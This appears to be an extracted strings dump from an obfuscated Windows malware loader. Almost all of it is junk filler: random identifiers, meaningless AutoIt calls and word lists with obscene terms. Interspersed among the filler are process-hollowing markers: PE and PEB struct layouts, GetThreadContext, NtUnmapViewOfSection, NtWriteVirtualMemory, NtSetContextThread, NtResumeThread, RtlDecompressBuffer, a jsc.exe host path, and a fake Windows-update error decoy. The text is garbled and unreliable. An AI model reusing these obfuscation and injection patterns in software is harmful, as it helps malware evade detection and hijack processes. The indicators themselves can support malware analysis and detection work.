WinGetPos('attack/Mayor/')
HWnd('minneapolis*drag*volunteers*took*carbon*')
mPvZWeX
98
ContextFlags
HWnd('settlement=bhutan=')
mbZpyQICFAnMCyx
rncwW
LrHWuRSw
XZVGAAOTSNxYgyOCFt
qzkqHRGCg
axis Rapids
105
StringIsFloat('oYhOVbmqHnD')
GetThreadContext
npqjuU
hPuWoFYMdr
QwcjQEeHU
SGooasb
NEGATIVE/GENEALOGY/NEARBY/HAPPY/IMPROVEMENT/
WinGetPos('narrow^compiled^')
kxIVB
Ebx
EAT*ROOMS*CONSTRUCTED*EQUALITY*
models*drink*piss*templates*warner*
Francis=Qualifying=
Rdx
pzQgUMJVJMpOQRyPnHwoGl
Sqrt(42610)
gMqZNQzGF
ybkrKKimQfFquSF
AeHkefSgqrwE
char Magic[2]; word BytesOnLastPage; word Pages; word Relocations; word SizeofHeader; word MinimumExtra; word MaximumExtra; word SS; word SP; word Checksum; word IP; word CS; word Relocation; word Overlay; char Reserved[8]; word OEMIdentifier; word OEMInformation; char Reserved2[20]; dword AddressOfNewExeHeader
participant+Jets+Wit+
Conclude^Birmingham^Therefore^Infrared^
80
WinGetPos('Momentum^Severe^Tales^')
UasBJGms
comparison!Studied!Accessing!
mary compounds
Sqrt(33274)
fog-Subject-
AddressOfNewExeHeader
15
WinGetPos('Excluding+Rates+Shuttle+')
glucose+Petroleum+Dealers+
Magic
Refer!Ja!Random!Delivery!Hire!
MZ
TerminateProcess
defining-sip-
lIHYctpFPrQmZnUJPDB
ftYCryCYQs
dword Signature
StringIsFloat('wBijjzXk')
Chip^Principal^Motorcycle^Inflation^Referenced^
Signature
YoASxFFkjPiwpewjdY
TghZZRVLG
TcAssjjYj
uDWmjrPEejsJOjtJBC
orBCFVTggaYfx
word Machine; word NumberOfSections; dword TimeDateStamp; dword PointerToSymbolTable; dword NumberOfSymbols; word SizeOfOptionalHeader; word Characteristics
Dirt=Workstation=
WinGetPos('TRIBES PREMISES CONNECTICUT HOST BREAD ')
exclusively helpful
NiDhHlzgOXZhvS
IpbSzvORa
NumberOfSections
Taken Uniprotkb
vjPhIA
naked@stolen@embedded@steve@
Sqrt(4397)
word Magic;
calgary=Wn=Futures=
Seriously Dg Blues Membership
DriveGetSerial('ffeNfBkMtK')
universe=Export=Ml=Owners=Vegetable=
word Magic; byte MajorLinkerVersion; byte MinorLinkerVersion; dword SizeOfCode; dword SizeOfInitializedData; dword SizeOfUninitializedData; dword AddressOfEntryPoint; dword BaseOfCode; dword BaseOfData; dword ImageBase; dword SectionAlignment; dword FileAlignment;
word MajorOperatingSystemVersion; word MinorOperatingSystemVersion; word MajorImageVersion; word MinorImageVersion; word MajorSubsystemVersion; word MinorSubsystemVersion; dword Win32VersionValue; dword SizeOfImage; dword SizeOfHeaders; dword CheckSum; word Subsystem;
word DllCharacteristics; dword SizeOfStackReserve; dword SizeOfStackCommit; dword SizeOfHeapReserve; dword SizeOfHeapCommit; dword LoaderFlags; dword NumberOfRvaAndSizes
word Magic; byte MajorLinkerVersion; byte MinorLinkerVersion; dword SizeOfCode; dword SizeOfInitializedData; dword SizeOfUninitializedData; dword AddressOfEntryPoint; dword BaseOfCode; uint64 ImageBase; dword SectionAlignment; dword FileAlignment;
word MajorOperatingSystemVersion; word MinorOperatingSystemVersion; word MajorImageVersion; word MinorImageVersion; word MajorSubsystemVersion; word MinorSubsystemVersion; dword Win32VersionValue; dword SizeOfImage; dword SizeOfHeaders; dword CheckSum;
word Subsystem; word DllCharacteristics; uint64 SizeOfStackReserve; uint64 SizeOfStackCommit; uint64 SizeOfHeapReserve; uint64 SizeOfHeapCommit; dword LoaderFlags; dword NumberOfRvaAndSizes
StringIsFloat('eOmqkswi')
WinGetPos('INTELLIGENCE@COFFEE@TRANSFERS@LONGITUDE@CARRIER@')
Eur#Flows#Shepherd#Tobago#
HWnd('renew=scary=gtk=duck=')
WinGetPos('doe max yo ')
HWnd('IMPLEMENT+BELTS+')
administrative Locally
FKtrkf
OFWJYzLkrVN
Buddy Bm According
StringIsFloat('UURZQRfBRwfG')
AddressOfEntryPoint
StringIsFloat('hJbExqjeToI')
HWnd('peripherals=Informational=Frequency=')
DriveGetSerial('wRncVppBRUgwJIcn')
Sqrt(22035)
Sqrt(39205)
XbepvKD
SizeOfHeaders
lPZhVXX
aiNFkxCaFP
qynHyosMFjqMI
ImageBase
ata#voting#parade#sequences#redeem#
Detector-Low-Numerical-
surf vessels november contracts roster
Hewlett-Cp-Syntax-Jul-
SizeOfImage
blHNkVDm
JJujSbzuYhEVClbD
pkhmpjuvxQG
DriveGetSerial('TWLuiBM')
mRxosXD
kyOYvAi
nOZguupNDfXA
TRAY^SPARE^WINTER^PROCEED^SEAL^
dword VirtualAddress; dword Size
Sqrt(38164)
FJzeqLPv
WinGetPos('CB*ZIMBABWE*DIANE*YEARS*BIOLOGY*')
XGrlJta
Sqrt(51824)
HWnd('MASTURBATION!ARMS!EXPLANATION!MUZE!FINANCING!')
WinGetPos('goat=cdt=stated=')
follows=Case=Swimming=
functional^prayer^helicopter^confidentiality^
oBhs
85
Firewall=Nudist=Determining=
DriveGetSerial('nvzjoBQODnyBJadlD')
HWnd('poor#Terrorist#')
textbook*Wireless*Investor*
cure-Plugins-Month-Haiti-
caring!sitting!
154
SENSORS@WHOM@ACROSS@EXCELLENT@
129
Sqrt(25312)
xLsrka
slide/movers/randy/
kJurhEpK
uTImTMWSvh
vIcNQeRLQxico
HWnd('tel^Rw^Functioning^Fork^Declared^')
Concrete=Trial=Financing=
Sqrt(12237)
evening!Connectors!Stewart!Oxford!
WinGetPos('Ate/Wire/Vbulletin/Eos/Walked/')
Table Mississippi Comparative Hardcore
BOjTHCcWKGbmKka
JuOqibsdJWk
Memory=Prior=
HAfwHPYWovg
ldJgqxKhAV
oXtTSEuf
cwDKgDuFsJpGw
DriveGetSerial('bgJEAsBXt')
mPDrxyPB
KiatuNfiguSK
WfvrKJljLN
rpFkkETCk
Jfvrjw
reFkjDjqBwKfgh
BUdWxACPo
dUZnCwHkDCIZtteoeVZUSUaWXXZRu
PATROL PJ
Sqrt(38878)
WinGetPos('OB@AOL@SHOWCASE@BEARING@')
downloadcom^happiness^experiencing^pork^
savannah@Cell@Bob@Physical@
phases=margaret=ddr=pushing=report=
SWCjBRd
Aside#Memphis#
REhMSxTfd
qeqzhrAoxmtSosnY
TnPTLURbQXD
StringIsFloat('sylSesTIL')
TRULY=NOTIFICATION=SUPPORTING=
DriveGetSerial('tYogzqMVH')
NONPROFIT=ELEPHANT=PRESENTED=
Sqrt(47266)
StringIsFloat('NrqwSRYrSXDo')
DOMINANT+JEREMY+ATTRIBUTES+ASCII+LOGGING+
established=Fireplace=
OzlvDaBRG
lAAQEnWGVPnZy
DUepsVMvq
iqKcChzwNRfCEnwDhTcYEiYM
DriveGetSerial('NeqtVbscA')
187
StringIsFloat('PTFlkdCKvLc')
CPuOgCQfRV
KDosGHgbua
BIRTHDAY FOLLOWED KENYA PEE INDIANS
Omissions!Yukon!Tuition!
Bacterial+Lo+
Sqrt(41876)
zRExenX
pcltWEjLWZM
locations representative acoustic
day@Ago@Departmental@
DtoKhTtHO
aFmTdWp
pipCRun
UQLNmUcKXJUAFmNo
bMAwnMWDAxI
gQVMf
WinGetPos('BEIJING@CROATIA@')
second#blind#
yIZeTpf
WinGetPos('DDR KURT BRUNSWICK ACCESSIBLE BUNCH ')
HZPzWCRrzZhgdI
char Name[8]; dword UnionOfVirtualSizeAndPhysicalAddress; dword VirtualAddress; dword SizeOfRawData; dword PointerToRawData; dword PointerToRelocations; dword PointerToLinenumbers; word NumberOfRelocations; word NumberOfLinenumbers; dword Characteristics
TBxexBA
OxJxMcGLExD
JoMwPt
StringIsFloat('lsBbcpOm')
nkOTFFCxWgvS
CKZSaKjsFySJlJc
qwbDAQBP
StringIsFloat('oxTSzSKI')
DriveGetSerial('tADNJRxYjsgLCudVD')
SizeOfRawData
REQUIRED JOIN ANDREAS SAVES
112
ucSADWIfE
GlQJplDHAM
ngrmlbAclg
PointerToRawData
shoe herbal rev ensures
way!Junction!Generator!Troops!Nervous!
DriveGetSerial('OeKbUKpHji')
WinGetPos('iowa@academics@finding@example@')
1
fQpFWofpqZAiSLgcMGZ
vEoeTIfMVS
bright!Aaa!Programming!Carbon!Gsm!
DriveGetSerial('pGvlBGIPHT')
Sqrt(48278)
189
HWnd('hit@bay@transcript@tan@latina@')
UnionOfVirtualSizeAndPhysicalAddress
StringIsFloat('JprqmXFMpGjI')
WinGetPos('PLATE@TWINS@INCLUSION@')
JFoGvtFryz
HWnd('knock@Proudly@')
WIRED*GOOD*STRAIGHT*
140
servers=Regulatory=Elephant=
organized=meets=
niGmDEzAXkxteJJiuyRelTpww
Gap=Bank=
ntdll.dll
NtWriteVirtualMemory
dword_ptr*
MUSLIM BILL UNDERGRADUATE
Sqrt(39805)
rqoDYPGPDbDPQGPKo
cgXYNJEYUcFqwg
DriveGetSerial('IIRvdwi')
SlnRiYmQU
StringIsFloat('oCLkYjQExzGEsy')
JCLOGxUbN
QCaQyUGQc
XzWvvz
Intelligence-Cyprus-
Foo Parker
rzPKoIPVLpvXmCuu
iKYhUzrOS
affair*Hugh*Classified*Seed*
kOXPxjoO
zjhlphBNxvP
StringIsFloat('lhmwwucj')
lock jj idaho its another
Distant#Us#Popularity#Album#Memories#
byte InheritedAddressSpace; byte ReadImageFileExecOptions; byte BeingDebugged; byte Spare; ptr Mutant; ptr ImageBaseAddress; ptr LoaderData; ptr ProcessParameters; ptr SubSystemData; ptr ProcessHeap; ptr FastPebLock; ptr FastPebLockRoutine; ptr FastPebUnlockRoutine; dword EnvironmentUpdateCount; ptr KernelCallbackTable; ptr EventLogSection; ptr EventLog; ptr FreeList;
dword TlsExpansionCounter; ptr TlsBitmap; dword TlsBitmapBits[2]; ptr ReadOnlySharedMemoryBase; ptr ReadOnlySharedMemoryHeap; ptr ReadOnlyStaticServerData; ptr AnsiCodePageData; ptr OemCodePageData; ptr UnicodeCaseTableData; dword NumberOfProcessors; dword NtGlobalFlag; byte Spare2[4]; int64 CriticalSectionTimeout; dword HeapSegmentReserve; dword HeapSegmentCommit;
dword HeapDeCommitTotalFreeThreshold; dword HeapDeCommitFreeBlockThreshold; dword NumberOfHeaps; dword MaximumNumberOfHeaps; ptr ProcessHeaps; ptr GdiSharedHandleTable; ptr ProcessStarterHelper; ptr GdiDCAttributeList; ptr LoaderLock; dword OSMajorVersion; dword OSMinorVersion; dword OSBuildNumber; dword OSPlatformId; dword ImageSubSystem; dword ImageSubSystemMajorVersion;
dword ImageSubSystemMinorVersion; dword GdiHandleBuffer[34]; dword PostProcessInitRoutine; dword TlsExpansionBitmap; byte TlsExpansionBitmapBits[128]; dword SessionId
Guitars/Ab/Narrow/
Investigators/Mailing/Herald/Bus/Insert/
NtReadVirtualMemory
ULTRAM*BRIDE*R*BATHROOMS*
Sqrt(23502)
ImageBaseAddress
CMS/ALIGN/
DriveGetSerial('WhXTUbbK')
199
call+terrace+
BbdmDCAJsx
Sqrt(11331)
DriveGetSerial('ZJmglSKVOaJN')
Eagles^Tooth^Investors^
UIUuE
gxXwloxCYzWpnMgR
xbYxIBDGhX
StringIsFloat('tZYhIUuqUvzCAn')
Eax
Contractor Rental
Virtual*Mp*Affect*Specials*Going*
Alt^Discounts^First^
Rcx
sic+site+described+eval+lesbian+
Accent/Inclusive/Aggressive/Those/
StringIsFloat('RKADJiQpLsR')
WinGetPos('SINGER#TREATY#SENATOR#LEON#CEREMONY#')
90
Computational/Tv/Ac/Multi/Affairs/
Retention!Outer!Qualifications!
PERFORMANCES@PLANNED@ISLAM@PATHOLOGY@
HWnd('LAMPS+TAIL+SHEER+ACCESS+SPLIT+')
shoppercom-Educators-Palestinian-
Outer@Passion@Milwaukee@Yacht@
iCIwxe
MJqZPzHiqZia
dword_ptr tempik;
Warren*Ati*
gXNOOUDIuNncpNTWBK
AOjYXNmsTaHBTxsznEtMikApiktt
xPuUkjbzaDMcSsktYgiimDxTYGsv
November=Amounts=Desktops=Ecology=Proven=
deborah^Http^
COMPLICATIONS-REDHEAD-
VoPbfuiaYkTmhtXDJSbrGcYx
SEVEN/NB/
36
tempik
enter@gray@currencies@burton@pig@
NtProtectVirtualMemory
HWnd('WED@BASS@')
Sqrt(14960)
DriveGetSerial('SnTtG')
19
StringIsFloat('pLJAsJbeP')
zmozvP
dpJZyFVqZkFEbZw
EJuHKoZK
StringIsFloat('UpltTlNgcIa')
circus#Project#Barnes#Rainbow#
NtSetContextThread
DriveGetSerial('NvdCaZflUxqn')
gepIiAvqf
ZeulzLxybgpgwU
mDqEHtIb
Sqrt(40478)
cZaKgJUL
FDeTZkMrnoTmm
AdvcZFa
ZYxmqzgRinHwxDiLbmT
ZjtXXUZQwOznxg
NtResumeThread
long*
DriveGetSerial('wmgqLDOTOHtYSfLa')
WinGetPos('cycle*Folders*')
StringIsFloat('izpTaTTDTfQCk')
un+Uv+Namespace+Playing+
WinGetPos('hentai-conditions-trial-')
mdYNwzg
brlBrrPgosGw
koAHuL
Cafe Golf Joan
treasurer!advise!
DIABETES^ENABLE^MINI^
IpdOBrQ
dcXFrTCZZGY
JsLTmig
HWnd('MASTERS!N!PUMP!')
136
dkrJeo
PmjsLbIvNVRWDkNXHw
DxxxjflB
explore-Pulled-Consulting-Com-
AMBER*FR*LT*NU*PAKISTAN*
Sqrt(28603)
Sqrt(62361)
Chances#Drug#Written#
Sqrt(54852)
omega/Ir/Registration/Interactive/Complement/
HnfDOyQdS
StringIsFloat('QCpEgQaRuGO')
HWnd('Manufacturer/Languages/')
uZgygnUwMvgKJrHHLzs
ILoIHicigwKb
HWnd('possess/plots/polyester/')
gwZynpZpj
kbAgvIEUDfLlncFM
MiAgZEdAD
Arising@Textile@Cloudy@Associates@
ipod!Organizations!Enterprise!Brunette!Seniors!
162
StringIsFloat('sONBNRegQ')
StringIsFloat('BbkXXjPjSJJ')
wKQIvwdo
DxboHjOfCG
YacVSsNErLzhg
lresult
SendMessage
wparam
lparam
DriveGetSerial('uCKFQKjdEzHRHtoXm')
OL SUGGESTS LETTING MEL
rmbkYbbBozoYqCfhPVrCUZiHdt
answers-Candy-Fuji-Mess-
MARIAH=LICENSES=
HOLIDAY/BARGAINS/INTRODUCES/TION/
beastiality#angela#referral#terrace#usual#
xQcsDV
WhcvESip
PRvrZO
LQOBfsI
BpxMOwe
aLJOLxHkpH
elizabeth@Ob@Translations@
NRMNT
marcus!disney!poultry!
S
george#searches#designers#detroit#nv#
webcams convinced jim door
regards-valley-meters-safe-
OGtsADBPDbtUpdMN
honzcLgaept
interracial=Institutes=Arrow=
EKjuZdswqZbWVVnMZGJ
sAoy
starting/halo/adopted/cuts/
Error: Failed to configure Windows updates. Undo changes.
Windows updates. Undo changes
wooden wearing
StringIsFloat('UPAAsAgpmrHl')
xnlQoMZA
TcAvstROCriEQlSrq
mtVlXCoKZefb
HWnd('Hunting+Strategy+')
FLZBJBRSKJRhSMQ.FLZBJBRSKJRhSMQ
bYWmwgGsl
xYsethiVDxYW
YlbtAf
Sqrt(20810)
Sqrt(62754)
bWQGxSxe
StringIsFloat('rVvlVBUUwq')
xyZPqQaBAQFg
WrwwzFWG
StringIsFloat('gxOzfbiSPZAJp')
188
StringIsFloat('wJxlkARaTPlk')
StringIsFloat('OrjSOEgiCAZ')
yo-burner-previews-vector-
znBbimGuTDjkTJ
HWnd('SEVEN-HIGH-MLS-TMP-PARTLY-')
bgMcTVFpkrAPH
RgchpBA
uGxmSYMcb
HWnd('porn+hotmail+rush+discover+personality+')
OZLHbBgXW
Sqrt(64438)
HWnd('Clark^Brought^Rogers^')
detected@Planet@Handbags@Dude@
StringIsFloat('wAFXlRPArqmjy')
HWnd('Unless=Shell=Counties=Geography=')
TURNING COS JIMMY REJECT
DriveGetSerial('ESLIp')
VAULT!HTML!DESCRIPTION!
DvMAJItwPeTyGx
AMEND=DEMONSTRATES=
Sqrt(37834)
letting^bond^waters^
10
DriveGetSerial('hcXOBGiucnI')
50
DcBMDCSj
qqUYmqOEgrgjHGerIa
LVUjdczAvRzinPDmFmiT
TiVJuKrikC
pgdskIh
DriveGetSerial('VXOSbMgJMIQ')
library Devil Places Un Achievement
StringIsFloat('SASBbSLT')
Banners+Vulnerability+Asia+Nowhere+Alert+
makeup#online#christina#reproduce#southern#
Snowboard^Ahead^
StringIsFloat('zpWgOgEsLwr')
eeSmfbdoPYL
Sqrt(45803)
lKIjYSYfyaDGWrSLey
aKipeGJWKSHAt
HWnd('MON PHANTOM CUSTOMERS TROOPS ')
advertising/us/preferences/
ytmslid
WinGetPos('Think-Projected-Qualifying-')
square October
vzWxBudTK
GIG FOLLOWS FOOTAGE DOMINANT
YOGhmwTygc
AOsFthRhPecgvkM
qhkMtOzJQWHbbbTO
vZtwYToKlb
analysis@vc@granted@
QUALIFY/STATISTICS/
van!Extract!
WinGetPos('RS@DELETE@TIMES@VIEWERS@')
disease@tables@shot@
qvM
perl Famous Permanent Spine Figure
WinGetPos('Particle+Strong+Entity+')
29
HWnd('carefully#technical#')
GUGruBDmvtWLhoAnLXimSyBx
CmUrTIVBzkaN
opspnknzEMRL
sexcam^Criteria^Prayer^
DriveGetSerial('FfSwBH')
HWnd('reliance longest bryan ')
Str^Sox^Growth^Cape^Becoming^
Sqrt(13055)
DriveGetSerial('vQaOgmbG')
DriveGetSerial('hKmPXWbYOlB')
FLs
StringIsFloat('MdAQobaTXACguI')
WinGetPos('CbcePGsIpdoPARQtg')
initiated=Wanna=Inspector=Permit=
finances promoted scary gps
HWyoZJoKpbirPzKRutS
uWfPORUe
StringIsFloat('TtWkCtkDkdrBm')
Nasdaq#Hugo#Alliance#
BANGBUS+ZONING+KB+
PiUPkekKMFGgfnAF
HWnd('knowing/Carrying/Structure/Cf/')
xaqfRn
ZBVhVxtX
HlcLQTITFhnQKCOUD
AJhtpo
WinGetPos('xdrSbDZwzUHJM')
WinGetPos('food@Waste@Current@')
FIzbTaGvezXDxi
back^Essex^Bracelet^Hormone^
Psychiatry-Opponents-Huge-
pdas-greg-ict-bolivia-registry-
Sqrt(38749)
DriveGetSerial('BukOSI')
Sqrt(56239)
newport#prior#rs#dogs#
curriculum@incorporated@lil@drug@
StringIsFloat('GFGorDYMOQC')
iuroHkBQCmIKM
mVWCwpsRCprkZa
Sqrt(6984)
for sexy known souls
CONCEPTS THOROUGHLY GRAIN
RegqXUwpfU
DriveGetSerial('SeWsE')
WinGetPos('hours@failing@updates@')
Developed#Yeah#Else#Mon#
FEMALES+ADSL+COOKED+
PASTOR=REMIX=SHOES=
WinGetPos('Periodic@Subtle@Efficiency@Caught@')
create-those-banks-arg-
INTERVALS#WESTERN#COMPETE#
ROBINSON*INDEXES*MASSIVE*
INDIVIDUALLY!LUCIA!GREENE!BEAUTIFUL!PREVIOUSLY!
BynEAbFufiKrjwHwdKuFaKDJJmW
PRESENTING*ACER*
106
KrkEieV
sICTXzIq
Sqrt(822)
ZEN*NEIGHBORS*
LqQZ
EbFFspDkPLgAzx
calm models
StringIsFloat('LsiBMkRAuXiXP')
RELATIONS!UNDERGRADUATE!CAMP!EXPERIENCE!AUTOMATION!
DriveGetSerial('TUiAOQtAvTVtkms')
8
HWnd('Biggest#Concerns#Beginner#Doubt#')
indianapolis+Qui+Priced+Okay+Accessibility+
fSPFqV
CONFIDENTIALITY MANCHESTER EXTERIOR LM
TZslawYFfhzpNto
LIMNllyGZFJiYE
zKodFviQ
wRzmcJoM
aoIjZZLlyONZB
WinGetPos('python Dosage ')
Sqrt(12418)
PRxiCqaKMuvOfXPgi
working@March@Sizes@Fire@Cliff@
VPN@INTER@SPOTS@ANDORRA@OAKS@
Sqrt(47899)
StringIsFloat('LuaxmITUWlRpaG')
discretion k buffalo replied benchmark
Participating#Mpegs#Shemales#Replies#Fortune#
HWnd('mp*nos*subscriptions*vendor*activities*')
most/black/manufacturer/competitive/ep/
TDFaoq
AxfndCdWBv
JGKwnb
suLQASCXgQUPnZtdK
DriveGetSerial('QOEvRtgW')
AMPLIFIER@INDUCTION@SAPPHIRE@
BELLE^PORTFOLIO^
DriveGetSerial('IqoucbEYGs')
BpnyZcyM
NSCpzUByb
hxmbzwRZZtk
StringIsFloat('gthdeBXVnBdjy')
mqacAtPxaQItkjLDGedbzGrVxkked
heads+June+
yHlhUuVEITAtLMU
WinGetPos('bhutan/Worst/Reply/')
StringIsFloat('AXCruWqvZ')
CZwaOYzhVwUaX
djNShVMNXaSfDkt
EMcKpWaafZOi
WinGetPos('Thinkpad!Addressed!Trust!Greene!Boots!')
space#Perspectives#Vaccine#Fitness#Lodge#
Sqrt(28832)
StringIsFloat('wUvWVILW')
KaLwOnmgLnk
HWnd('zqVURMfwkyvqLpcpZSA')
qdStpcjIrPTfaZdEtw
MYwVwaiXDQaaSCWYmhH
DriveGetSerial('GIkxoHOi')
Dubai#Commodities#Champions#September#Deutsche#
tZHvPnlHuvldxzkZyS
DriveGetSerial('lUyiuH')
WinGetPos('Python*Acid*')
0
WinGetPos('A@DATABASE@DISTINGUISHED@HANDLE@DEF@')
WinGetPos('mitchell Co Describes Association Couples ')
CsYeTQZwjovpVDcsz
BqODAYCIVWTFG
3
cIlxgpdscNLRkKRthI
uGCqlC
YDlwTCJgnIdKRoViqBE
RpqakprvBWEJ
ZnBQPJXWy
faIYniFGnfEGqFhzZz
dsblfgbxEtwfzZ
PRAISE!CHEAP!WARRANT!CANDLE!
PAT-FRAMING-
yNXeTMJ
ZTmxVBLnO
LiblbTks
DriveGetSerial('zxkMbnVVPnw')
WinGetPos('elizabeth!projected!teach!hills!')
shade*Playboy*Spirit*Properly*
concerns@uniform@productivity@pens@exist@
HWnd('Violence@Mainly@Instrument@Shoppers@Niagara@')
Sqrt(33901)
WinGetPos('qZEHDQBRSbNCGCX')
INNS+SWING+PETROLEUM+PANTS+SURROUNDING+
izjmRSPujYtSFYFjeOoxtDjnBVls
TEiOXVH
japan@Goto@
tribe=Psychological=Bridal=Rapidly=
iWISgDuUQakHQjsO
Sqrt(66358)
119
StringIsFloat('mmbdWonlnXRFNQ')
107
DriveGetSerial('NzcphWzVQl')
DriveGetSerial('PlgiiGmM')
WinGetPos('donna/jeans/')
XoegJxug
maqoVTHJJOQieWuqc
zTSAjjMRJV
FGKBlZYufxHx
mNGHEpNQUhrSKs
YnEmSibFrKCfxtKfikKTOMsI
affiliation feeds significantly
tOvDZkiViaNvhj
cXCKou
MUD!SEEKING!FIRED!
HWnd('played#Beverly#Swiss#Trends#Comes#')
WinGetPos('Inspiration^Search^Kent^')
bOVgeokc
sWzhcA
YknLuqAbGM
VOTING#WORLDSEX#HOPEFULLY#CABIN#EXCEL#
NIinfNYHGPJiw
PHOTOGRAPHS*JEWEL*DEDICATED*ME*
HWnd('albania*mods*')
STATING!HOCKEY!BUCKS!BBS!INTERVENTION!
CHARGER=RECREATION=
dYHCwyxcNAmIj
WZlRBCe
reviewed+charts+
dXZqYzrlGTbahnMuNrU
rRJEuYe
hYQSYvtEjyNABCzULRz
Sp#Su#Hobby#
Dependence=Yn=Stick=Violin=
166
ScNsjas
YEMTtLffajuWt
wolVLZvVxpZDeB
HWnd('opened/cvs/')
StringIsFloat('JMTlksQyi')
Sqrt(29248)
pqhzGF
JtWgCbIuazYt
DgdrprhzmKeMF
photoshop!external!
manually*Screensavers*Mozilla*
60
bMTkpYQo
rHfqYb
ITSELF MIGHTY DOMAIN WAVE
23
native+wizard+charging+
HWnd('Begins^Oldest^Trinity^Said^Imports^')
haFuecPWNli
AUFqj
mFobfOcV
znUDDazaRnMq
EwBCrGb
TcmIVMegfBwPfL
btTGh
RZxsfmzLsLfzdQS
ZvQIzXSzTjmdh
HWnd('diesel^collins^')
Wrapped=Hitting=
\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Respiratory*Size*Sponsors*Commerce*
sTriAyaXi
sfKRYHLwloj
DriveGetSerial('UYjZNRcp')
HWnd('wallpapers^Income^Retirement^')
success@Repeat@Discussions@Turns@
8234942558510335355217329
GetTickCount
ZXzpiA
Sqrt(10440)
committees*restriction*infrastructure*
Nfp
DWORD
Sleep
HWnd('bare Wallpaper Merit ')
StringIsFloat('agiepByFbFSok')
brazilian Republican
54
NtUnmapViewOfSection
StringIsFloat('pIdkcuHD')
Sqrt(55348)
performs=Clothes=Hungry=
WinGetPos('SUITES@ARRAY@AVAILABILITY@LIMITING@SEAS@')
Sqrt(56235)
yhGDaZGq
Guild*Ronald*Dx*
Worldcat Everybody Taylor Labs
WpInxJUBXglFpKCGzHPeCjxFWRqf
RiNAGYDRRpCcKPeCCJEIwtdQupnVf
WinGetPos('ACCREDITATION/DINNER/')
nipples=Milk=Irish=
Sqrt(8620)
133
Miller=Representing=Referring=Submit=
HWnd('interventions#bhutan#')
publicity#cameras#glossary#
Processor*Eggs*Ibm*
HiSEGzfphWFhYyQCoC
DriveGetSerial('kJKOolXfVwHjb')
Pursuit Si Cum Detective
Boy!Memories!Warcraft!Consequence!
WinGetPos('Motivation=Collected=Separation=')
CREEK=SPIES=
pipes doctor blessed complications
WinGetPos('BECOMING*CURRENTLY*CHALLENGING*YACHT*GUARANTEED*')
ZcMUNJtGg
DOx
HWnd('Sheets Summaries ')
cooling/layout/
WpISqNYsIi
Fossil-Tb-Recordings-Soul-
Competing Filtering Notice
73
saved+file+representation+
61
rbBRpBNLiuwc
DwmXrYOoNU
sports headers curves
WinGetPos('Bye Adaptation Boutique Glad ')
HWnd('STOCKHOLM#CATEGORIES#')
FJxssJsZjG
BAvUuuYOOSIJv
Allowed@Hard@Dc@
Naughty Slovak
wUSZrROjFXLNx
Sqrt(43660)
Ri Installed Order Fear
abraham+nikon+town+
cWxflGbsilI
OGQJctzq
Dot-Rocks-Dual-
body-Tongue-Nudist-Screw-
Roll Canvas V Interference Metropolitan
kAgabOhqd
BbCNAovPdJQfMlG
VZqyycMY
StringIsFloat('MUQgTQzF')
Sqrt(21921)
WinGetPos('SADDAM#BUTTONS#SENSORS#SHEPHERD#VIOLATION#')
Sqrt(24186)
yourself-Consumption-Arrive-Cambridge-Suites-
scored+wa+
VELHwuQWTC
AtMSoep
DriveGetSerial('uWlOTRgMTwqfjgioK')
WinGetPos('SHED*ARISING*LLC*CYLINDER*')
StringIsFloat('tuHGyefrnfYUeP')
WinGetPos('successfully Bukkake Sheet Receiving Few ')
measurement/barbie/
StringIsFloat('TnBSiRQjnLLiE')
rna know occupation msn screens
THOROUGHLY!COLORED!BRITISH!INSIDER!
izfwZC
lIyDMr
Sqrt(40867)
Sqrt(743)
rlKEDXR
cqbethdOCnql
dTfOTB
StringIsFloat('sVpPsVVY')
sacred!circumstances!requiring!lesbian!
IEydRkYHi
BukvMkq
FANTASTIC!INNS!CONFIDENT!MONITORING!NEWTON!
brilliant-movie-pads-confirm-
StringIsFloat('iPgcmulhnRIb')
LskMDeQpPl
XozyWqkLrLxHYHfJz
GGGpeeNmvsM
HWnd('pjbkpDaKCEbjf')
Illustrated Assure Deleted Solaris Maps
characters#security#quarterly#arkansas#mono#
HWnd('WIDTH/NOV/')
VQrVL
dvrqPq
Jungle@Mobiles@Great@Management@
StringIsFloat('uVRrHqqkDkr')
flashing digest antenna joke bed
HWnd('exciting-Request-Ref-Billing-Obj-')
DriveGetSerial('lSJclrLWpQucgG')
euItMzqpltzDSHnAIRqXW
fence#download#
sg+universal+
sbRKTgSIigTucFpxxCvO
zjAeIoyGGatWR
sCgnVoOgsTOf
constant@mp@sail@chester@annex@
bRtNeeijLJ
PROGRAM-TEAM-BOOKING-WEED-WHALE-
queensland!Singer!Field!
RTVMbGMbdisKvdFtkpv
HWnd('task*refuse*deployment*bored*')
PyLTLa
WsStDbgGs
RtlDecompressBuffer
ushort
PzOAxVAKXR
kw=Spokesman=Going=Oxford=Picking=
StringIsFloat('gaTUWINXTJ')
Sqrt(23692)
FACE=B=INTRODUCED=
WMmtDRHaxPpNEVQbqynQOuALpYww
EaqChrpa
yuLFtyELzazK
NrgzIle
HWnd('RADAR@SOAP@ANALYSTS@')
DeXFDO
ZwLDRVXIPbWfIygoO
PSWQBC
WLVtvuwrIMIursdYfIo
CkybhhUNlEoZ
OpenProcess
Train#Chose#
WinGetPos('country!street!shoot!huntington!')
StringIsFloat('RmuQyuwflXDXgB')
int ExitStatus; ptr PebBaseAddress; ptr AffinityMask; ptr BasePriority; ulong UniqueProcessId; ulong InheritedFromUniqueProcessId;
WinGetPos('arc!Ever!')
compile*guess*refined*
HWnd('Rob Term Antigua ')
WinGetPos('mortality Bobby Ladies ')
AEciyCe
ZwQueryInformationProcess
zNMiIfhkTymIYqmHr
moeQbyo
StringIsFloat('zvbyITyAoe')
MANGA/STAND/STANDARDS/
cMNrObaagFHZa
ELnsPdVvXnvT
GsGxleYG
oWThAXay
dqCjjvhWwoX
DEALERS/COURTESY/SHOPPERCOM/LOOPS/
ReadProcessMemory
FsvDAnoxMLptFuUDuNpwgm
GARMIN*EXHIBITS*
ushort Length;ushort MaxLength;ptr String
risk-For-Adjustment-Instead-U-
StringIsFloat('UprXMxpAsX')
reel=Domestic=Laboratories=End=Adults=
184
StringIsFloat('kWUbUMVC')
StringIsFloat('KzFuABEdnNj')
kEGMJxMK
SiDLMlMZwrFXxtYh
WVmycPsgbmc
DriveGetSerial('GOPdptwukMEull')
WinGetPos('DOCK=TECHNO=POSTPOSTED=LOSS=MAINTAIN=')
Fo+Governing+Essentially+Architecture+
HWnd('ARRANGE@PRICING@BLOCKS@EMAIL@')
String
Length
int*
Sqrt(54836)
obvious*Fin*Consecutive*Males*
StringIsFloat('szmWvByd')
Array!Patrick!
inquiries Built Cosmetic Cindy
DriveGetSerial('CWqJDufZ')
(\.\w{3}\
{0,1})(.*)
